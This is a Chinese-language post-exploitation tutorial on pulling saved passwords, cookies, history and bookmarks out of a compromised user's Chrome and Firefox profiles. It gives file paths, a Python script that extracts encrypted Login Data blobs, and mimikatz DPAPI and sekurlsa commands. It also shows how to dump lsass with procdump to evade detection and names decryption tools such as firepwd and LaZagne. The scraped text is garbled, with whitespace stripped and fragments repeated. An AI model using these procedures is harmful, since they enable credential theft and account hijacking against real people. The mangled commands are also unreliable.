2024获取浏览器相关敏感信息

获取浏览器相关敏感信息当我们获取特定用户的计算机权限后，为了深入分析目标的业务逻辑（浏览器访问行为），趣数据或系统的位置，可以尝试收集该用户常用浏览器的访问书签、访问记录、cookie0x00获取chrome浏览器保存的敏感信息0x00a获取书签信息chrome浏览器的用书签保存在"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\Bookmarks"中，该文件为json站，从而找到可能存在关键数据的网站系统。本文均以test用户为例进行讨论0x00b获取访问记录chrome浏览器的用户访问记录保存在"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\History"的urls表中，该文件为SQLite数据库文件，可以使用\hsqlitestudio打开查看。可以使用\h上网行为分析工具对"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\History"据的网站系统、制定针对该用户的进一步分析利用方案。0x00c获取保存的密码chrome浏览器会将用户保存的密码储存在"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\LoginData"的logins表中，该文件为SQLite数据库文件，可以使用\hsqlitestudio打开查看。字段即为用户保存密码的密文，chrome浏览器不同版本的浏览器对应的加密方式不同。在之前的版本，密码使用加密；在80.x之后的版本，使用AES-256-GCM进行加密。也可以通过密文格式来判断加密方式，如果密文以v10”或v11”为前缀，则代表对应的加密方式为AES-256-GCM。80.x之前在线获取密码可以使用神器mimikatz获取chrome浏览器保存的密码，需要以test用户权限执行命令：mimikatz.exemimikatz.exelogdpapi::chrome/in:"C:\Users\test\AppData\Local\Google\Chrome\UserDefault\LoginData"/unprotectexitx之前离线获取密码储存的明文密码时使用windows提供的DPAPI进行对称加密来保证安全性。加解密的密钥称为。有目标用户明文密码的情况fromosimportgetenvimportsqlite3importbinasciiconn=sqlite3.connect("Logincursor=conn.cursor()cursor.execute('SELECTaction_url,username_value,fromosimportgetenvimportsqlite3importbinasciiconn=sqlite3.connect("Logincursor=conn.cursor()cursor.execute('SELECTaction_url,username_value,password_valueFROMforresultincursor.fetchall():print(binascii.b2a_hex(result[2]))f=open('test.txt','wb')f.write(result[2])f.close()脚本执行后，提取LoginData中保存的密文，保存为test.txt获得该密文对应的MasterKeyfile，mimikatz命令如下：mimikatz.exemimikatz.exedpapi::blob/in:test.txtexit{a111b0f6-b4d7-{a111b0f6-b4d7-40c8-b536-672a8288b958}%APPDATA%\Microsoft\Protect\%SID%\a111b0f6-b4d7-%APPDATA%\Microsoft\Protect\%SID%\a111b0f6-b4d7-40c8-b536-672a8288b958MasterKey保存在MasterKeyfile中，使用用户密码的SHA1密文加密（NTLMhash使用MD4加密），取到用户的NTLMhash并不能解密MasterKeyfile获取MasterKey。在获取目标用户明文密码的情况下可以使用\hchromepass离线获取chrome保存的密码。解密需要获得三部分内容：%appdata%\Microsoft\Protect加密密钥(即MasterKey文件)，位于 下对应sid文件夹下的文件%appdata%\Microsoft\Protect数据库文件LoginData（"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\LoginData"）用户明文的密码，用于解密加密密钥由于chromepass程序的设计问题，以上文件需要组成特定格式，子目录格式如下：\AppData\Local\Google\Chrome\UserData\Default\LoginData\AppData\Local\Google\Chrome\UserData\Default\LoginData\AppData\Roaming\Microsoft\Protect{sid}}\下保存key文件{sid}必须同原系统的对应例如子目录格式如下：使用chromepass选择该目录，填入用户明文密码，如下图成功解密，如下图没有目标用户明文密码的情况在没有用户明文密码的情况下，无法从MasterKeyfile中获取MasterKey，但是可以从lsass进程内存中提取MasterKey。可以直接使用mimikatz获取MasterKeymimikatz.exemimikatz.exeprivilege::debug(需要管理员权限)sekurlsa::dpapiexit如下图提取出MasterKey为666638cbaea3b7cf1dc55688f939e50ea1002cded954a1d17d5fe0fbc90b7dd34677ac148af1f32caf828fdf7234bafbe14b666638cbaea3b7cf1dc55688f939e50ea1002cded954a1d17d5fe0fbc90b7dd34677ac148af1f32caf828fdf7234bafbe14b39791b3d7e587176576d39c3fa70如果无法确保在目标环境上运行mimikatz不被发现，也可以使用procdump等工具导出lsass将文件下载回本地获取MasterKey（与离线获取用户密码的方式一样）。procdump.exe-accepteula-procdump.exe-accepteula-malsass.exelsass.dmp使用mimikatz加载dmp文件，获取MasterKey：mimikatz.exesekurlsa::minidumpmimikatz.exesekurlsa::minidumplsass.dmpsekurlsa::dpapi通过以上两种方式获取到MasterKey后就可以使用mimikatz离线获取chrome保存的密码。mimikatz.exemimikatz.exelogdpapi::chrome/in:"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\LoginData"/unprotect/masterkey:666638cbaea3b7cf1dc55688f939e50ea1002cded954a1d17d5fe0fbc90b7dd34677ac148af1f32caf828fdf7234bafbe14b39791b3d7e587176576d39c3fa70exitx之后获取密码如上图所示80以后版本的chrome使用原始密钥对密码明文进行了AES-256-GCM加密，并将原始密钥经过DPAPI加密后储存在了"C:\Users\test\AppData\Local\Google\Chrome\UserData\LocalState"文件的ebcrypted_key中。该文件为json格式的文本文件。我们想要获取密码明文就需要先从json文件中获取ebcrypted_key。然后调用再通过AES-256-GCM解密获取明文密码。新版mimikatz支持了80.x之后的chrome密码的获取，只需要添/state："LocalState文件/state："LocalState文件"mimikatz.exemimikatz.exelogdpapi::chrome/in:"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\LoginData"/state:"C:\Users\test\AppData\Local\Google\Chrome\UserData\LocalState"/unprotectexit0x00d获取cookiecookie通常也叫做网站cookie、浏览器cookie或httpcookie，保存在浏览器端，它可以用来做用户认证、服务器校验等使用文本数据可以处理的问题。cookie机制可以弥补http协议无状态的缺点，在session多网站都采用cookie来跟踪会话。cookie实际是一段文本信息，当客户端请求服务器时，如果服务器需要记录该用户状态，response就向客户端颁发一个cookie，客户端会把cookie保存起来，浏览器再次请求该网站时，客户端连同该cookie器，服务器检查该cookie以辨认用户状态。们就可以尝试窃取用户的cookie我们就获取了目标用户的账号控制权。chrome浏览器的cookie保存在"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\Cookies"中，该文件为SQLite数据库文件，可以使用\hsqlitestudio打开查看。encrypted_value即为加密后的cookie值密文，加密方式同chrome线获取80.x版本之前的chrome保存的cookie信息可以使用mimikatz以test用户权限执行如下命令：mimikatz.exemimikatz.exelogdpapi::chrome/in:"C:\Users\test\AppData\Local\Google\Chrome\UserData\Default\Cookies"/unprotectexit0x01获取firefox浏览器保存的敏感信息默认情况下，firefox浏览器的用户配置信息保存在C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default\中。其中“xxxxxxxx”为8默认情况下，firefox浏览器的用户配置信息保存在C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default\0x01a查看基本信息命令行下查看firefox版本信息的方法：typetype"C:\ProgramFiles\MozillaFirefox\application.ini"|findstr#或者type"C:\ProgramFiles(x86)\MozillaFirefox\application.ini"|findstrVer判断Firefox浏览器版本：6464位Firefox浏览器的默认安装目录为C:\ProgramFiles\MozillaFirefox32位Firefox浏览器的默认安装目录为C:\ProgramFiles(x86)\MozillaFirefox0x01b获取书签信息firefox浏览器的书签储存在places.sqlite的moz_bookmarks表中，相关URL信息存储在"moz_places"表中，该文件为SQLite数据库文件，可以使用\hsqlitestudio打开查看。0x01c获取访问记录firefox浏览器的用户访问记录保存在places.sqlite的moz_places表中，该文件为SQLite数据库文件，可以使用\hsqlitestudio打开查看。可以使用\hfirefox-history-spy对访问记录进行分析。0x01d获取保存的密码解密流程读取密钥文件(key4.db或key3.db)，获得和iv(初始化矢量)读取记录文件(logins.json或signons.sqlite)的内容如果未设置MasterPassword，使用和iv对记录文件中的加密内容进行3DES-CBC解密。如果设置Password，还需要获得明文形式的MasterPassword，才能进行解密需要获取的文件离线导出firefox记录文件：Version大于等于32.0，保存记录的文件为logins.jsonVersion大于等于3.5，小于32.0，保存记录的文件为signons.sqliteencryptedUsername和encryptedPassword是加密的内容，解密需要获得密钥文件(key和iv)作3DES-CBC解密。不同版本的Firefox密钥文件的位置不同：Version小于58.0.2，密钥文件为key3.dbpy-2firepwd.py-d记录文件与密钥文件所在文件夹Version大于等于58.0.2，密钥文件为未设置MasterPassword时离线导出推荐使用\hfirepwdpy-2firepwd.py-d记录文件与密钥文件所在文件夹其它的可用工具：\hWebBrowserPassView.exe\hLazagne\hfirefox_decrypt直接使用firefox浏览器加载配置文件firefox.exefirefox.exe-profile记录文件与密钥文件所在文件夹设置了MasterPassword时离线导出为了提高安全性，Firefox浏览器支持为保存的密码添加额外的保护：设置MasterPassword。设置了MasterPassword后，解密流程如下：加载NetworkSecurityServices需要的nss3.dll调用NSS_Init()进行初始化调用PK11_GetInternalKeySlot()来获得internalslot(用作验证MasterPassword)调用PK11_CheckUserPassword()验证MasterPassword读取logins.json获得加密数据调用PK11SDR_Decrypt()进行解密设置了MasterPassword后，使用firefox浏览